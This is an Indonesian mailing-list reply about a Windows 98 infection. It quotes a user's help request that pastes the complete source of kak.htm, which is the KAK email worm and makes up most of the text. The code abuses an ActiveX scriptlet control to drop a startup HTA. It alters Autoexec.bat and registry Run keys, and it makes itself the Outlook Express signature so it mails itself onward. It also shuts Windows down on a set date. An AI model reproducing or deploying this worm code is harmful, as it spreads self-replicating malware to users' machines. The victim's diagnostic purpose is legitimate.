Pake AVP virusnya bisa dibersihin tapi sayangnya AVP tdk bisa bersihin virus
yg ada di database emailnya (cuman ngedeteksi). Jadi kalo virusnya udah ada
disana percuma ... ada lagi ... ada lagi ...
>Komputer saya pentium II 450 Mhz, 64 Mb. Setiap kali saya menjalankan
>Windows 98, selalu terbentuk file kak.htm di folder C:/Windows. Pada
>registry Windows juga tercatat adanya file kak di
>HKEY_CURRENT_USER\INDENTITIES\SOFTWARE\MICROSOFT \OUTLOOK
>EXPRESS\5.0\SIGNATURES\00000000
>Dan juga di key HKEY_USERS\DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENT
>VERSION\EXPLORER\DOC FIND SPEC MRU
>Bila saya mencoba menghapus key-key tsb dari registry dan juga menghapus
>file kak.htm dari C:\Windows, dan kemudian PC saya restart, file tsb akan
>terbentuk seperti semula lagi.
>Sebelum ini kejadiannya lebih parah dari ini. Pada saat PC di on-kan dan
>Windows berjalan, muncul kotak dialog yang berisi kata-kata
>"Kagou-Anti-Kro$oftsays not today!". Bila tombol Ok pada kotak dialog tsb
>di
>klik, maka Windows akan men-shutdown PC.
>Oh ya, saya sudah mencoba men-scan PC saya dengan PC CILLIN 6.0 virus
>pattern 586,d an dilaporkan tidak ada virus yang ditemukan. Bagaimana cara
>mengatasi persoalan ini dan apa sebenarnya yang menimpa PC saya?
>Berikut ini adalah kode HTMl dari file kak.htm yang terbentuk di C:\Windows
>PC saya:
><HTML><BODY><DIV
>style="POSITION:absolute;RIGHT:0px;TOP:-20px;Z-INDEX:5"><OBJECT
>classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC
>id=scr></OBJECT></DIV><SCRIPT><!--
>function sErr(){return
>true;}window.onerror=sErr;scr.Reset();scr.doc="Z<HTML><HEAD><TITLE>Driver
>Memory Error</"+"TITLE><HTA:APPLICATION ID=\"hO\"
>WINDOWSTATE=Minimize></"+"HEAD><BODY BGCOLOR=#CCCCCC><object id='wsh'
>classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></"+"object><SCRIPT>fun
>ction sEr(){self.close();return true;}window.onerror=sEr;fs=new
>ActiveXObject('Scripting.FileSystemObject');wd='C:\\\\Windows\\\\';fl=fs.Get
>Folder(wd+'Applic~1\\\\Identities');sbf=fl.SubFolders;for(var mye=new
>Enumerator(sbf);!mye.atEnd();mye.moveNext())idd=mye.item();ids=new
>String(idd);idn=ids.slice(31);fic=idn.substring(1,9);kfr=wd+'MENUD�~1\\\\PRO
>GRA~1\\\\D�MARR~1\\\\kak.hta';ken=wd+'STARTM~1\\\\Programs\\\\StartUp\\\\kak
>.hta';k2=wd+'System\\\\'+fic+'.hta';kk=(fs.FileExists(kfr))?kfr:ken;aek='C:\
>\\\AE.KAK';aeb='C:\\\\Autoexec.bat';if(!fs.FileExists(aek)){re=/kak.hta/i;if
>(hO.commandLine.search(re)!=-1){f1=fs.GetFile(aeb);f1.Copy(aek);t1=f1.OpenAs
>TextStream(8);pth=(kk==kfr)?wd+'MENUD�~1\\\\PROGRA~1\\\\D�MARR~1\\\\kak.hta'
>:ken;t1.WriteLine('@echo off>'+pth);t1.WriteLine('del
>'+pth);t1.Close();}}if(!fs.FileExists(k2)){fs.CopyFile(kk,k2);fs.GetFile(k2)
>.Attributes=2;}t2=fs.CreateTextFile(wd+'kak.reg');t2.write('REGEDIT4');t2.Wr
>iteBlankLines(2);ky='[HKEY_CURRENT_USER\\\\Identities\\\\'+idn+'\\\\Software
>\\\\Microsoft\\\\Outlook
>Express\\\\5.0';sg='\\\\signatures';t2.WriteLine(ky+sg+']');t2.Write('\"Defa
>ult
>Signature\"=\"00000000\"');t2.WriteBlankLines(2);t2.WriteLine(ky+sg+'\\\\000
>00000]');t2.WriteLine('\"name\"=\"Signature
>#1\"');t2.WriteLine('\"type\"=dword:00000002');t2.WriteLine('\"text\"=\"\"')
>;t2.Write('\"file\"=\"C:\\\\\\\\WINDOWS\\\\\\\\kak.htm\"');t2.WriteBlankLine
>s(2);t2.WriteLine(ky+']');t2.Write('\"Signature
>Flags\"=dword:00000003');t2.WriteBlankLines(2);t2.WriteLine('[HKEY_LOCAL_MAC
>HINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run]');t2.Writ
>e('\"cAg0u\"=\"C:\\\\\\\\WINDOWS\\\\\\\\SYSTEM\\\\\\\\'+fic+'.hta\"');t2.Wri
>teBlankLines(2);t2.close();wsh.Run(wd+'Regedit.exe -s
>'+wd+'kak.reg');t3=fs.CreateTextFile(wd+'kak.htm',1);t3.Write('<HTML><BODY><
>DIV style=\"POSITION:absolute;RIGHT:0px;TOP:-20px;Z-INDEX:5\"><OBJECT
>classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC
>id=scr></"+"OBJECT></"+"DIV>');t4=fs.OpenTextFile(k2,1);while(t4.Read(1)!='Z
>');t3.WriteLine('<SCRIPT><!--');t3.write('function sErr(){return
>true;}window.onerror=sErr;scr.Reset();scr.doc=\"Z');rs=t4.Read(3095);t4.clos
>e();rd=/\\\\/g;re=/\"/g;rf=/<\\//g;rt=rs.replace(rd,'\\\\\\\\').replace(re,'
>\\\\\"').replace(rf,'</"+"\"+\"');t3.WriteLine(rt+'\";la=(navigator.systemLa
>nguage)?navigator.systemLanguage:navigator.language;scr.Path=(la==\"fr\")?\"
>C:\\\\\\\\windows\\\\\\\\Menu
>D�marrer\\\\\\\\Programmes\\\\\\\\D�marrage\\\\\\\\kak.hta\":\"C:\\\\\\\\win
>dows\\\\\\\\Start
>Menu\\\\\\\\Programs\\\\\\\\StartUp\\\\\\\\kak.hta\";agt=navigator.userAgent
>.toLowerCase();if(((agt.indexOf(\"msie\")!=-1)&&(parseInt(navigator.appVersi
>on)>4))||(agt.indexOf(\"msie
>.\")!=-1))scr.write();');t3.write('//
>--></"+"'+'SCRIPT></"+"'+'OBJECT></"+
>"'+'BODY></"+"'+'HTML>');t3.close();fs.GetFile(wd+'kak.htm').Attributes=2;fs
>.DeleteFile(wd+'kak.reg');d=new Date();if(d.getDate()==1 &&
>d.getHours()>17){alert('Kagou-Anti-Kro$oft says not today
>!');wsh.Run(wd+'RUNDLL32.EXE
>user.exe,exitwindows');}self.close();</"+"SCRIPT>S3 driver memory alloc
>failed
>!]]%%%%%</"+"BODY></"+"HTM";la=(navigator.systemLanguage)?navigator.systemLa
>nguage:navigator.language;scr.Path=(la=="fr")?"C:\\windows\\Menu
>D�marrer\\Programmes\\D�marrage\\kak.hta":"C:\\windows\\Start
>Menu\\Programs\\StartUp\\kak.hta";agt=navigator.userAgent.toLowerCase();if((
>(agt.indexOf("msie")!=-1)&&(parseInt(navigator.appVersion)>4))||(agt.indexOf
>("msie 5.")!=-1))scr.write();
>// --></SCRIPT></OBJECT></BODY></HTML>
>
>
>
>------------------------------------------------------------------------
>[EMAIL PROTECTED] - Mailing List (milis) MIKRODATA
>
>Post message: [EMAIL PROTECTED]
>Subscribe : [EMAIL PROTECTED]
>Unsubscribe : [EMAIL PROTECTED]
>Website : http://mikrodata.co.id
>FTPsite : ftp.mikrodata.co.id
>Archives : http://www.mail-archive.com/forum%40mikrodata.co.id/
>
>Milis ini menjadi kontribusi rubrik Konsultasi, Klinik Virus, Opini IT,
>Klinik Linux, dan Antar Pembaca di MIKRODATA, Info Komputer,
>Detikcom (i-Net), KOMPAS Cyber Media (KCM), dan AntiVirus Media.
>
________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com
------------------------------------------------------------------------
[EMAIL PROTECTED] - Mailing List (milis) MIKRODATA
Post message: [EMAIL PROTECTED]
Subscribe : [EMAIL PROTECTED]
Unsubscribe : [EMAIL PROTECTED]
Website : http://mikrodata.co.id
FTPsite : ftp.mikrodata.co.id
Archives : http://www.mail-archive.com/forum%40mikrodata.co.id/
Milis ini menjadi kontribusi rubrik Konsultasi, Klinik Virus, Opini IT,
Klinik Linux, dan Antar Pembaca di MIKRODATA, Info Komputer,
Detikcom (i-Net), KOMPAS Cyber Media (KCM), dan AntiVirus Media.
